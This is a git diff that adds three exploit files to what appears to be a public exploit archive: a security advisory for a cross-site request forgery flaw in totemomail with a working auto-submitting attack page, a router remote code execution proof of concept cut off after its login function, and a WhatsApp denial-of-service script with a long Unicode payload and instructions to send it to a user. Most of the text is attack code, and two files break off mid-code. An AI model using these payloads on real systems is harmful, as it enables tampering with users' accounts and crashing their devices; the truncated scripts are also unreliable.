diff --git a/exploits/asp/webapps/44631.html b/exploits/asp/webapps/44631.html
new file mode 100644
index 000000000..1fee4895a
--- /dev/null
+++ b/exploits/asp/webapps/44631.html
@@ -0,0 +1,144 @@
+<!--
+################################################################################
+#
+# COMPASS SECURITY ADVISORY
+# https://www.compass-security.com/research/advisories/
+#
+################################################################################
+#
+# Product:  totemomail Encryption Gateway
+# Vendor:   totemo AG
+# CSNC ID:  CSNC-2018-003
+# CVE ID:   CVE-2018-6563
+# Subject:  Cross-Site Request Forgery
+# Risk:     High
+# Effect:   Remotely exploitable
+# Author:   Nicolas Heiniger <nicolas.heiniger@compass-security.com>
+# Date:     14.05.2018
+#
+################################################################################
+
+Introduction:
+-------------
+The totemomail Encryption Gateway protects email communication with any external
+partner by encryption. It doesn't matter whether you exchange emails with
+technically savvy communication partners or with those who have neither an
+appropriate infrastructure nor the necessary know-how. The encryption gateway
+also makes it easy to securely send very large attachments.[1]
+
+Compass Security discovered a vulnerability in the webmail part of the
+solution. It is possible to predict all parameters that are required to
+execute actions on the webmail interface. This allows an attacker to perform
+Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web
+page that will automatically send a request to the Encryption Gateway. If the
+user is logged in, the request will be executed by the Encryption Gateway on
+behalf of the logged in user. This could be used to change a user's settings, send emails or
+change contact informations.
+
+
+Affected:
+---------
+Vulnerable:
+ * 6.0.0_Build_371
+
+No other version was tested but is is likely that older versions are affected as
+well.
+
+
+Technical Description
+---------------------
+In the webmail, no anti-CSRF token is used. Although the viewState makes the
+attack more complex, it is possible to entirely predict the requests and thus,
+perform CSRF attacks. The requirement here is to perform the attack as a replay of a full
+user interaction. One has to replay every request to make sure that the viewState is
+updated on the server side and corresponds to the action that is performed by
+the malicious page.
+
+Such a malicious page is presented below, it will automatically send 3 requests
+that will change the user's detail:
+==========
+-->
+
+<html>
+  <body>
+    <script>
+      function submitRequest1()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
+        xhr.withCredentials = true;
+        var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+
+      function submitRequest2()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
+        xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.withCredentials = true;
+        var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+
+      function submitRequest3()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
+        xhr.withCredentials = true;
+        var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF$
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+
+      submitRequest1();
+      submitRequest2();
+      submitRequest3();
+    </script>
+  </body>
+</html>
+
+<!--
+==========
+
+
+Workaround / Fix:
+-----------------
+Install an up to date version of totemomail Encryption Gateway.
+
+As a developer, the requests that execute actions must include an unpredictable
+element. This is usually done by using an anti-CSRF token. This token is a
+random value tied to the user's session and must be verified by the server
+before executing any action on behalf of the user.
+
+
+Timeline:
+---------
+2018-05-14:     Coordinated public disclosure date
+2018-03-XX:     Release of fixed version 6.0_b511
+2018-02-13:     Initial vendor response
+2018-02-09:     Initial vendor notification
+2018-02-02:     Assigned CVE-2018-6563
+2018-01-11:     Discovery by Nicolas Heiniger
+
+
+References:
+-----------
+[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption
+-->
\ No newline at end of file
diff --git a/exploits/hardware/remote/44635.py b/exploits/hardware/remote/44635.py
new file mode 100755
index 000000000..e132d9874
--- /dev/null
+++ b/exploits/hardware/remote/44635.py
@@ -0,0 +1,29 @@
+'''
+Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.
+
+This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
+'''
+
+#!/usr/bin/python3
+
+import json
+import sys
+import socket
+import os
+import time
+from websocket import create_connection
+
+def ubusAuth(host, username, password):
+    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
+    req = json.dumps({"jsonrpc":"2.0","method":"call",
+        "params":["00000000000000000000000000000000","session","login",
+        {"username": username,"password":password}],
+        "id":666})
+    ws.send(req)
+    response =  json.loads(ws.recv())
+    ws.close()
+    try:
+        key = response.get('result')[1].get('ubus_rpc_session')
+    except IndexError:
+        return(None)
+    return(key)
\ No newline at end of file
diff --git a/exploits/ios/dos/44629.py b/exploits/ios/dos/44629.py
new file mode 100755
index 000000000..4a7b48d0e
--- /dev/null
+++ b/exploits/ios/dos/44629.py
@@ -0,0 +1,81 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> at Exploit Pack
+- http://www.exploitpack.com
+# This vulnerability has been discovered and exploited using Exploit
+Pack - Framework
+#
+# Tested on: iPhone 5/6s/X iOS 10 and 11.3 ( Latest release of iOS at
+the date of writing this code )
+#
+# Description:
+# WhatsApp 2.18.31 and prior are affected. The application fails to
+properly filter user-supplied input and its prone to a remote memory
+corruption.
+#
+# Impact:
+# Resource exhaustion attacks exploit a design flaw. An attacker could
+exploit this vulnerability to remotely corrupt the memory of the
+application forcing an uhandled exception
+# in the context of the application that could potentially result in a
+denial-of-service condition and/or remote memory corruption.
+#
+# Debug:
+# B04500954836","name":"WhatsApp"}
+# Date/Time:       2018-04-06 18:15:30.608135 +0200
+# OS Version:      iPhone OS 11.2.6 (Build 15D100)
+# Architecture:    arm64
+# Report Version:  19
+# Command:         WhatsApp
+# Path:
+/private/var/containers/Bundle/Application/2F86B692-D9A3-4BAC-B45E-6DCF62F47C2C/WhatsApp.app/WhatsApp
+# Version:         2.18.31 (2.18.31.32)
+# Beta Identifier: 4CA20191-C4A3-4920-ADEB-9ABAD10FCDF7
+# Parent:          launchd [1]
+# PID:             28010
+# Event:           cpu usage
+# CPU:             144s cpu time over 145 seconds (99% cpu average),
+exceeding limit of 80% cpu over 180 seconds
+# Action taken:    Process killed
+# Duration:        144.81s
+# Steps:           48
+# Hardware model:  iPhone7,1
+# Exception Type: EXC_CRASH (SIGKILL)
+#
+# How to use this exploit:
+# Send the payload as a message to a whatsapp user, trough a phone or
+whatsapp-web.
+#
+# Timeline:
+# Date and time of release: 6 April 2018
+# Triaged by Facebook: 25 April 2018
+# Reported to Apple ( it's a bug on their side ): 01 May 2018
+# Vendor homepage: http://www.whatsapp.com / http://www.facebook.com
+
+import sys
+reload(sys)
+
+def whatsapp(filename):
+    sys.setdefaultencoding("utf-8")
+    payload = u'⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈